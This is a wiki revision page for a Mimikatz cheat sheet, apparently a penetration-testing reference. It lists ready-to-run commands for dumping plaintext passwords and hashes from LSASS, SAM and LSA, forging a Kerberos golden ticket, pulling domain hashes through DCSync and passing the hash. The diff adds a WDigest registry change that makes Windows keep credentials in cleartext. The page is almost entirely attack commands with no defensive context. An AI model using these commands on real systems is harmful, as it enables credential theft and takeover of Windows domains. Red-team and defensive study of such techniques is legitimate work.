Mimikatz: Difference between revisions
Jump to navigation
Jump to search
m (→Steal creds) |
mNo edit summary |
||
Line 22: | Line 22: | ||
=== Pass the Hash === | === Pass the Hash === | ||
* sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd | * sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd | ||
=== Wdigest - Extracting Passwords in Cleartext === | |||
* sekurlsa::wdigest | |||
* <code>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1</code> |
Revision as of 22:21, 24 June 2023
Stealing plain text credentials
- privilege::debug
- sekurlsa::logonpasswords
Dump Hashes
- token::elevate
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Create a golden ticket on the domain controller
- privilege::debug
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL>
Pass the Hash
- sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd
Wdigest - Extracting Passwords in Cleartext
- sekurlsa::wdigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1